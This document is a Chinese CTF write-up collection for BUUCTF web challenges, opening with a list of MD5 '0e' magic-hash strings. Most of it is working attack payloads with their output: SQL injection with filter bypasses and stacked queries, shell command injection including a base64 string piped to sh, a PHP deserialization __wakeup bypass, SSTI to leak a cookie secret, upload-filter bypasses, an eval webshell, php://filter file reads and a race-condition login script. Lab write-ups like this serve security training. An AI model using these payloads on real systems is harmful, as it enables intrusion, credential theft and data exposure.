1182124884hello:0e743085805252927775565385290397
1219528398hello:0e868489106034723523559320341834
1365961680hello:0e668883720723418111245548953214
1437570351hello:0e206240563971050550116633301219
1545366180hello:0e257204273001610237815292534804
1913398263hello:0e500122072987105499558769309919
2082832014hello:0e641531560203654077289258748768
2110419268hello:0e762171063695462807358759123750
2555322872hello:0e112021453091938008179926214432
2703428329hello:0e539034975375694709628091119285
3112336944hello:00e84318121438045061107416117877
3628930742hello:0e151552396662602699790731012016
3631323377hello:0e931363893282159188068848944511
4037048254hello:0e967077438787013328807625996622
4191516815hello:0e825371282614850860463388078467
4489161974hello:0e558707314409339998121484069293
4587231365hello:0e504446921245543672741298606269
4675405977hello:0e212362508980563187307380624574
5306434168hello:0e233977016726735249825850112191
5386712952hello:0e979094825139201743271623118497
5475907700hello:0e320113725965349531245264287508
5687931703hello:00e24990249063715603043847588412
6221420259hello:0e427088803668170868968681882372
6289610963hello:0e798422082256872983511618278639
6619082729hello:0e632129769104845720449638434365
6978760807hello:0e277822600679140301163408072337
6998768449hello:000e8035366967428111420789887452
7257714879hello:0e145836254131914671762702802248
7516045380hello:0e794296267645314378837157280716
8007474935hello:0e797660940305640059960923840530
8085405950hello:0e919749841593600480396602490551
8484894580hello:0e386534009257600539447714376960
8713342948hello:0e299007796530052469172589577557
8979944845hello:0e874413536934946580761991223533
9096228048hello:00e55480549742593479712918207437
9295326389hello:0e745300758703252891987480809406
9300271123hello:0e608352080747646815330536960302
9541321678hello:0e847259933883272237056784406542
9549528299hello:0e026724414718028157133240637643
hello1835612665:0e695502374759494568304076914962
hello1975889545:0e397431486738711936984824494127
hello2122258678:0e355754319526429296453963428621
hello2360199793:0e723640171579308600048103169197
hello2446924064:0e724243036529668902792507562841
hello2453151154:0e699828270766224167379051893230
hello2671160964:0e991314659725335977252965500812
hello3477156574:0e351869381366502712134558862779
hello3604940606:0e339703243496858659637178841304
hello3684340598:0e379962815375430180676055487647
hello3777842420:0e069131503592996704083669449098
hello3829645523:0e491115376538379914583803505526
hello3860468983:0e944498014881245171922637714771
hello3919876333:0e238954473242774066673182260621
hello4507888400:0e352301353053764000765589033360
hello4605444662:0e125787292128680471912637832157
hello4811388663:0e013747045260524485184037794915
hello4986053629:0e481204005586521649559409679900
hello5484151115:0e472189797727655093199339150672
hello5940758885:0e324620312086945257345832085592
hello6373592457:00e27029941820603345228601454319
hello6381543031:0e449824447122481665122660747248
hello6639974172:0e176089859050714805502433397456
hello7086860668:0e648874773746431631520736757720
hello7374388760:0e549064947501414644573642844626
hello7658019462:0e098815389405733553036135137403
hello7685375055:0e652150710039140728339196199010
hello8315902836:0e459343631065651364048523771633
hello8416618147:0e941242457321132837764267348274
hello8432644674:0e995949026043127195120779393623
hello8478436793:0e076622792501044716258916967463
hello9244594853:00e72957216100821023191573342510
hello9323512300:0e904310212375757042757551233487
hello9363131394:0e560411388484291716353637426222
hello9542774356:0e428258301000971183683390506375
0eRnJWi9XnKd9Z7x:0e623435437885705149665265323886
10209937038hello:0e751087553632951666954105945855
10657590124hello:0e412825784296994813673923046768
11372555763hello:0e033986194768180713959602159890
12046439106hello:0e086480164341626882924899142907
12658616286hello:0e331845474827674218000636146681
12803012125hello:0e743542551632021350623273288309
12832323351hello:0e107303994101791601610489605716
13494297451hello:0e871241942888840744154041163279
14922311682hello:00e90897696814423421503111013874
15669003106hello:0e057642476503058773682559259910
16001706719hello:0e434889771613853625195052101267
17424761499hello:0e360899786644122892711479288030
17566368381hello:0e068388224779546143336426711904
17715857190hello:0e821993049235653827748561923700
17789203077hello:0e363752286934748004267478332720
17985191625hello:0e710917156631142531976917685938
18087324632hello:0e218582682560037679432658764131
18172193956hello:0e197655911012583910606537789411
18300492070hello:0e791913724986920161109490945425
18334039264hello:0e901414916553612529150636179347
18454696015hello:00e36239940494820624886917103633
18827539334hello:0e708685749493051383997168720064
19021413300hello:0e286684064973701562754646189930
19146871622hello:0e911457360322005766446588406231
19374210165hello:0e021895121757290175000580073925
19857626471hello:0e247446874683380579709339779277
20043873956hello:0e353485834487835012843802093795
20722168628hello:0e440955275288620608351823343427
20939594552hello:0e776768690649094123168185279570
21045260537hello:0e503408782980464689452899992245
21985078371hello:00e99600087846922253588391363999
22105796210hello:0e704677955924781057083566761155
2PefxVf2JmrwxjDH:0e755309175686000342207575969583
7KvnOhF3vtmgcyge:0e067163562252210316413100043115
C0zcSWqwKEoWEAgk:0e373876668454513642191223584240
OvjvwiDH6z21j5Sw:0e480801274702183837296236500883
PB16DdlZwFLcGZkt:0e303732628701743861345481400946
VnKk0FwwuNOBdgxF:0e010133950146407417801169748688
W34mwVgBMxjTlefK:0e520891067050733616611692220497
WsDxECzeZtT3mLhW:0e725420191847615995846416099824
Y19PxQ8ibTgih84w:00e73400130860032588503590621328
YuLcwLYfhTO5sY5t:0e140024319784642702848046984729
ZUkMJPx7C8lMsrfq:0e771599882535532352154962129065
hello10474449125:0e474441707290900694930228433006
hello10672785079:0e859173238273273455651853557908
hello10890987208:0e175370484277394504384587260411
hello11797141519:0e732793752744629114494286417663
hello11858925934:0e617304905381053105798903298240
hello11946898529:0e742627851258428405240773858206
hello12214692295:0e892585293178019132096606038104
hello12560553820:0e597110581935218364198446515779
hello12598230177:0e668603196060723079925408295422
hello12843075495:0e839011002232277416984005143745
hello13125991246:0e914119447124053184837596602810
hello13167752025:0e558977309300052364660200559690
hello13334882644:0e316254807757583857349425586730
hello13407113867:0e288796248230952258217585561073
hello14062169111:0e049244235820395072512978352110
hello14377472903:0e392752400759036121301780363977
hello14542031811:0e993811297795641783927086214820
hello14549026960:0e228469762885608934453271169645
hello14695240931:0e809229513191992773750209262421
hello14711786334:0e015890930978824184417033457171
hello14813130399:0e918361104734546542049362421574
hello14916008992:0e466819090700704408768809355877
hello14943865304:0e488468752018350982728547761723
hello14998876620:0e703717133545667739210903323083
hello15041922164:0e049115676628046268387027519760
hello15108682064:0e748863568511001009100615283009
hello15253019448:0e316384599798704817278060496674
hello15396444514:0e118295099101694190498400868465
hello15474675991:0e922451586661705450371971984450
hello16082441020:00e95246441910436569610504494429
hello16220342703:0e704187673611855154964811990062
hello16339255101:00e58378298714355054522900730468
hello17023991779:0e698031537843159768162020780735
hello18656227376:0e685754512634902310450933716189
hello18783191515:0e732403697443088745177978608703
hello19088586243:0e911992123744915158360782778515
hello19168039924:0e642276872339101894040672638043
hello19195083900:0e674601908431368289110857474953
hello19793116672:0e811903033662824759764930345353
hello20713211437:0e977690635887290867676681639188
hello21259679978:0e547772458960324697116900050578
hello21333925385:0e670417101053731652248174312214
hello21576290701:0e088186168631173581624876059389
hello21625635498:0e803278139459070019409565297938
hello21960910191:0e494496613662122765707618390572
hello22131016813:00e89083858553525267218694193703
hello22355149941:00e66954822291536238327643342602
hello22407846698:0e688065097905052131160818049682
hello22462419833:0e150021313229535479448960192497
hello22524840741:0e427165560473709541262115879322
hello22684541754:0e212089178649039431933729688866
hello23311692247:0e875225739151635763781768168050
hello23482483937:0e151847567205329626226186994212
hello23919947361:0e554834940334311467473897130531
hello24034989169:0e220987314997743625442964283314
hello24343860700:0e070680132080871095604490841909
hello25957571388:0e505306610086634417027764698286
hello26790263335:0e781189643377847208451601226827
hello26903464651:0e914022345307317030885198241992
kFuiNituEBtYTL7s:00e98964689272988335938577613800
kZCLJqaExeldVpj0:0e656721453248642852483628066363
leEyBd5B7q3amjyG:0e394953505745405474013722050568
pumLyoapZAA9UDNG:00e97704981801156036802648235478
x3nHz0Tb1fId6UkI:0e389404952944040555093072566533
xqtlmRSdIANTlm1H:0e744254988746519482021441207857
zLnCfDklbnUmxqPX:0e584534642350465243534981705206
HFS_8z1+MWlaHRAH:00e75643634650030148510424537209
HFS_1+iq1ID4UnnU:0e735266984036051110930327520427
HFS_4HfzrCkFGXpw:0e646281365937497392704373659016
HFS_b+l93ZTnenaK:0e361812035730460151531645473846
HFS_StAqHq+DGI8d:0e111862011654913151517331666493
HFS_AxFzm23nYzeD:0e613355377549634251553032324836
HFS_0cIiLSiSswkh:00e66018400048726119673849053795
HFS_E0m8zzZKFT2R:00e13091337053035690315301170677
HFS_iWViAQ5MOc5g:00e26430923330343164204018649849
HFS_S73mdmL3numx:0e588371083636394650517986368324
HFS_9/rKCeq8tcY9:0e632684922796334502827808200584
.V;m=*]b?-:00e45653718969294213009554265803
egNJHP66&3E1:00e99757454497342716194968339146
KnCM6ogsNA1W:00e73414578113850089230341919829
&rh1ls6cl&G4:00e48890746054592674909531744787
0e215962017:0e291242476940776845150308577824

字符串汇总

第三步

绕过强类型比较

levell14.php

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

数组绕过

MD5碰撞

Are there two known strings which have the same MD5 hash value?

Collisions for Hash Functions MD4, MD5, HAVAL-128 and RIPEMD

这部分我就不尝试了,感兴趣的朋友可以深入研究

[HCTF 2018]admin

hint

首页,change页存在注释

<!-- you are not admin -->

<!-- https://github.com/woadsl1234/hctf_flask/ -->

预期解

unicode同形字

参考资料

spotify历史漏洞-Creative usernames and Spotify account hijacking https://engineering.atspotify.com/2013/06/18/creative-usernames/

strlower 方法会将大写字母转化为小写
注意:上下标字母会被转化为对应同形字

routes.py 登录页 /login 和改密页 /change 都会执行 strlower 方法

unicode 字符标准化时会转变为对应的同形字

利用同形字 ᴬdmin 注册时会执行一次 strlower 方法,在 /change 页更改密码会再次执行 strlower 方法

ᴬ -> A -> a

这样就能实现 admin 登录

上下标字母查询表-Superscript and Subscript Letters

str.lower

非预期

flask session伪造

代码解密session

出处:PHITHON

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

flask-session-cookie-manager

config.py 中查得 SECRET_KEY=ckj123

试了好几次还是没出,好烦

正常情况

条件竞争

import requests 
import threading
def login(s, username, password): 
    data = {'username': username, 'password':password, 'submit': ''}
    return s.post("http://abb82588-6b5e-444e-8c58-c86ee65d552b.node4.buuoj.cn:81/login", data=data)
def logout(s):
    return s.get("http://abb82588-6b5e-444e-8c58-c86ee65d552b.node4.buuoj.cn:81/logout")
def change(s, newpassword): 
    data = {'newpassword':newpassword }
    return s.post("http://abb82588-6b5e-444e-8c58-c86ee65d552b.node4.buuoj.cn:81/change", data=data)
def func1(s):
    login(s, 'master', 'master') 
    change(s, 'ba2in9a')
def func2(s): 
    logout(s)
    res = login(s, 'admin', 'ba2in9a')
    if '<a href="/index">/index</a>' in res.text:
        print('finish')
def main():
    for i in range(9999):
        print(i)
        s = requests.Session()
        t1 = threading.Thread(target=func1, args=(s,)) 
        t2 = threading.Thread(target=func2, args=(s,)) 
        t1.start()
        t2.start()
if __name__ == "__main__": 
    main()

没有达到预期,放弃了

出题人ckj123的write up

Sky师傅一血的write up

graneed的write up

[极客大挑战 2019]BuyFlag

/pay.php

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

You must be a student from CUIT!!!
Only Cuit’s students can buy the FLAG

将 Cookie: user=0 改为 1

you are Cuiter

松散比较

当 password == 404 时密码正确

PHP松散比较绕过

password=404flag

Password Right!
Pay for the flag!!!hacker!!!

科学计数法或数组

Flag need your 100000000 money

money=1000000000

Nember lenth is too long

money=99999999

即当money的值小于100000000时

you have not enough money,loser~

money=1e9 / money[]=1

[护网杯 2018]easy_tornado

hint

/flag.txt

/file?filename=/flag.txt&filehash=e772097775f523d08a70818acbcfa39e

flag in /fllllllllllllag

filename=/fllllllllllllag

/welcome.txt

/file?filename=/welcome.txt&filehash=df5cb6a70865f967cc4f829f0bfdb80f

render

SSTI

轻量级 WEB 框架 Tornado(python)调用 render 方法生成 template ,

/file?filename=/hints.txt&filehash=4954f0b53a5bcfe596332cc9f4a3c8e7

/hints.txt
md5(cookie_secret+md5(filename))

指出如何生成 filehash 的值

重点在获取 cookie_secret 的值

cookie_secret 是 handler.application.settings 的键值。

  • handler -> RequestHandler

  • RequestHandler.settings -> self.application.settings

  • handler.settings -> handler.application.settings

可以直接通过 handler.settings 访问到 cookie_secret

/error?msg={{handler.settings}}

{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'cba73db5-9b2f-4f78-a0c1-577900cda7d6'}

md5 生成 filehash


服务器端模板注入(SSTI)专题

一篇文章带你理解漏洞之 SSTI 漏洞

Authentication and security

RequestHandler.settings

Template syntax - handler

[ACTF2020 新生赛]BackupFile

扫目录

/index.php.bak

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}
?>

PHP松散比较

Payload

?key=123

[极客大挑战 2019]BabySQL

?username=admin&password=-1' or 1=1 #

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘1=1 #’’ at line 1

过滤了相应关键字,双写可实现绕过

?username=admin&password=-1' oorr 1=1 #

Hello admin!
Your password is ‘b57c0551628355fa5a8a3e247f810f7e’

?username=admin&password=-1' uniunionon selselectect 1,2,3 #

Hello 2!
Your password is ‘3’

?username=admin&password=-1' uniunionon selselectect 1,version(),database() #

Hello 10.3.18-MariaDB!
Your password is ‘geek’

?username=admin&password=-1' uniunionon selselectect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #

Hello b4bsql,geekuser!

?username=admin&password=-1' uniunionon selselectect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #

Hello id,username,password!

?username=admin&password=-1' uniunionon selselectect 1,group_concat(id,username,passwoorrd),3 frfromom b4bsql #
Hello 1cl4yi_want_to_play_2077,2sqlsql_injection_is_so_fun,3porndo_you_know_pornhub,4gitgithub_is_different_from_pornhub,5Stopyou_found_flag_so_stop,6badguyi_told_you_to_stop,7hackerhack_by_cl4y,8flagflag{792d2355-89eb-4b4e-b89a-96437b387278}!

[极客大挑战 2019]PHP

扫出来个 www.zip

给了相关源码

/index.php

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

PHP反序列化

/class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

unserialize 会检查是否存在 __wakeup 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源

这里需要绕过 __wakeup 方法

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过 __wakeup 的执行

__wakeup()函数漏洞以及实际漏洞分析

Exploit

<?php
class Name
{
    private $username = 'admin';
    private $password = '100';
}
$a = new Name();
echo serialize($a);
?>

序列化

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

Payload

?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

[RoarCTF 2019]Easy Calc

/index.html

$('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })

/calc.php

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>
calc.php?%20num=phpinfo()

PHP字符串解析函数绕过 Abusing PHP query string parser to bypass IDS, IPS, and WAF

calc.php?%20num=var_dump(scandir(chr(47)))

calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

[极客大挑战 2019]LoveSQL

?username=admin&password=-1%27+or+1%3D1+%23

hint

Your password is ‘50753b5b26e65cbcdfab97b0e4569841’

md5 解密就不用想了,继续尝试

尝试联合注入

判断字段数

?username=admin&password=-1' order by 1,2,3,4 #

Unknown column ‘4’ in ‘order clause’

有三个字段

?username=admin&password=-1' union select 1,2,3 #

查看数据库基础信息

?username=admin&password=-1' union select 1,@@version_compile_os,version() #
?username=admin&password=-1' union select 1,user(),database() #

Linux,10.3.18-MariaDB,root@localhost,geek

查表

url?username=admin&password=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='geek' #

Hello geekuser,l0ve1ysq1!

查字段

?username=admin&password=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1' #

Hello id,username,password!

查数据

?username=admin&password=-1' union select 1,group_concat(id,username,password),3 from l0ve1ysq1 #
Hello 1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{b1305613-af15-4561-b1c0-8ba3f2d4b04f}!

[强网杯 2019]随便注

源码

<?php
function waf1($inject) {
    preg_match("/select|update|delete|drop|insert|where|\./i",$inject) && die('return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);');
}
function waf2($inject) {
    strstr($inject, "set") && strstr($inject, "prepare") && die('strstr($inject, "set") && strstr($inject, "prepare")');
}
if(isset($_GET['inject'])) {
    $id = $_GET['inject'];
    waf1($id);
    waf2($id);
    $mysqli = new mysqli("127.0.0.1","root","root","supersqli");
    $sql = "select * from `words` where id = '$id';";
    $res = $mysqli->multi_query($sql);
    if ($res){
      do{
        if ($rs = $mysqli->store_result()){
          while ($row = $rs->fetch_row()){
            var_dump($row);
            echo "<br>";
          }
          $rs->Close(); 
          if ($mysqli->more_results()){  
            echo "<hr>";
          }
        }
      }while($mysqli->next_result()); 
    } else {
      echo "error ".$mysqli->errno." : ".$mysqli->error;
    }
    $mysqli->close();  
}
?>

联合注入

-1' or 1=1 order by 3 #

error 1054 : Unknown column ‘3’ in ‘order clause’

-1' union select 1,2 #

hint

return preg_match(“/select|update|delete|drop|insert|where|./i”,$inject);

堆叠注入

-1';show tables#

array(1) {
[0]=>
string(16) “1919810931114514”
}

array(1) {
[0]=>
string(5) “words”
}

-1';desc `1919810931114514`#

array(6) {
[0]=>
string(4) “flag”
[1]=>
string(12) “varchar(100)”
[2]=>
string(2) “NO”
[3]=>
string(0) “”
[4]=>
NULL
[5]=>
string(0) “”
}

预处理语句绕过

-1';prepare zero from concat('sel','ect * from `1919810931114514`');execute zero;#
-1';prepare zero from concat(char(115,101,108,101,99,116),' * from `1919810931114514`');execute zero;#

strstr($inject, “set”) && strstr($inject, “prepare”)

-1';SET @sqli=concat('sel','ect * from `1919810931114514`');PREPARE zero from @sqli;execute zero;#
-1';SET @sqli=concat(char(115,101,108,101,99,116),' * from `1919810931114514`');PREPARE zero from @sqli;execute zero;#

替换表名列名

-1'; alter table words rename to others;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

[GXYCTF2019]Ping Ping Ping

目录下有两个文件

flag.php

index.php

空格、flag 存在过滤,无法直接查看

/?ip=1.1.1.1|cat$IFS$1index.php

<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}
?>

变量替换

通过变量 a 实现字符替换

/?ip=1.1.1.1|a=g;cat$IFS$9fla$a.php

内联执行

将反引号内命令的输出作为输入执行

/?ip=1.1.1.1|cat$IFS$9`ls`

编码绕过

/?ip=1.1.1.1|echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$9-d|sh

Linux 下存在多种 Shell 程序,选择可用 Shell 即可

内部域分隔符 IFS(Internal Field Separator) Linux 的 env 变量,bash shell 下默认为空格、制表符和换行符

[ACTF2020 新生赛]Exec

1.1.1.1;cat /flag

[ACTF2020 新生赛]Upload

/index.php

<?php
	error_reporting(0);

	define("UPLOAD_PATH", "./uplo4d");
	$msg = "Upload Success!";
	if (isset($_POST['submit'])) {
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $file_name = $_FILES['upload_file']['name'];
        $ext = pathinfo($file_name,PATHINFO_EXTENSION);
        if(in_array($ext, ['php', 'php3', 'php4', 'php5'])) {
	        exit('nonono~ Bad file!');
    	}

        $new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;
        
        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
    }

?>

main.js

function checkFile() {
        var file = document.getElementsByName('upload_file')[0].value;
        if (file == null || file == "") {
            alert("请选择要上传的文件!");
            return false;
        }
        //定义允许上传的文件类型
        var allow_ext = ".webp|.webp|.gif";
        //提取上传文件的类型
        var ext_name = file.substring(file.lastIndexOf("."));
        //判断上传文件类型是否允许上传
        if (allow_ext.indexOf(ext_name) == -1) {
            var errMsg = "该文件不允许上传,请上传jpg、png、gif结尾的图片噢!";
            alert(errMsg);
            return false;
        }
    }

绕过相应检测

[极客大挑战 2019]Upload

upload_file.php

<?php
$file = $_FILES["file"];
  
// 允许上传的图片后缀
$allowedExts = array("php","php2","php3","php4","php5","pht","phtm");
$temp = explode(".", $file["name"]);
$extension = strtolower(end($temp));
$image_type = @exif_imagetype($file["tmp_name"]);

if ((($file["type"] == "image/gif")
|| ($file["type"] == "image/jpeg")
|| ($file["type"] == "image/jpg")
|| ($file["type"] == "image/pjpeg")
|| ($file["type"] == "image/x-png")
|| ($file["type"] == "image/png"))
&&$file["size"] < 20480)
{
	if ($file["error"] > 0){
		echo "ERROR!!!";
	}
	elseif (in_array($extension, $allowedExts)) {
		echo "NOT!".$extension."!";
	} 
	elseif (mb_strpos(file_get_contents($file["tmp_name"]), "<?") !== FALSE) {
		echo "NO! HACKER! your file included '&#x3C;&#x3F;'";
	}
	elseif (!$image_type) {
		echo "Don't lie to me, it's not image at all!!!";
	}
	else{
		$fileName='./upload/'.$file['name'];
		move_uploaded_file($file['tmp_name'],$fileName);
		echo "上传文件名: " . $file["name"] . "<br>";
	}
}
else
{
	echo "Not image!";
}
?>

需绕过复合检测

文件后缀名黑名单检测

文件类型 php 函数检测

文件大小检测

<? php 特征检测

最后将合法文件移动至 upload 目录下

可用 ASPX 一句话,后缀为 phtml ,文件头修改为 GIF89a?

上传时将 Content-Type 参数改为 image/jpeg

[极客大挑战 2019]Knife

/index.php

<?php
eval($_POST["Syc"]);
?>

一句话木马,通过蚁剑连接

[极客大挑战 2019]Secret File

<a id="master" href="./Archive_room.php" xxx</a>

跳转至 Archive_room.php

<a id="master" href="./action.php" xxx</a>

302 重定向至 end.php

Burp 拦截

/secr3t.php

<html>  
 <title>secret</title>  
 <meta charset="UTF-8">  
<?php  
    highlight_file(__FILE__); error_reporting(0); $file=$_GET['file'];  
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){  
        echo "Oh no!";  
        exit();  
    }  
    include($file); //flag放在了flag.php里  
?>  
</html>

php://filter 获取源码

flag and secr3t

[ACTF2020 新生赛]Include

hint

Can you find out the flag?

?file=flag.php

PHP 伪协议

php://filter

?file=php://filter/read=convert.base64-encode/resource=flag.php

[SUCTF 2019]EasySQL

var_dump

回显格式反推出使用 var_dump 实现输出

拿字典跑了下,屏蔽了某些关键词

堆叠注入

query=1;show databases #

query=-1; show tables #

query=-1; show columns from Flag #

from 被过滤,不可行

参考资料

BUUCTF—web题解法汇总-UCASZ https://ucasers.cn/buuctf-web%E9%A2%98%E8%A7%A3%E6%B3%95%E6%B1%87%E6%80%BB/#title-3

$sql = "select ".$post['query']."||flag from Flag";
1;set sql_mode=PIPES_AS_CONCAT;select 1

*,1

select \*,1 from Flag

[极客大挑战 2019]EasySQL

/check.php?username=admin&password=%27+or+1%3D1

/check.php?username=admin&password=%27+or+1%3D1+%23

[极客大挑战 2019]Http

href=”Secret.php”

It doesn’t come from ‘https://Sycsecret.buuoj.cn

HTTP Header 详解

Referer: https://Sycsecret.buuoj.cn

Please use “Syclover” browser

No!!! you can only read this locally!!!

[极客大挑战 2019]Havefun

<!--
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        }
        -->

?cat=dog

[HCTF 2018]WarmUp

<!--source.php-->

/source.php

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.webp\" />";
    }  
?>

hint

/hint.php

flag not here, and flag in ffffllllaaaagggg

?file=hint.php?../../../../../ffffllllaaaagggg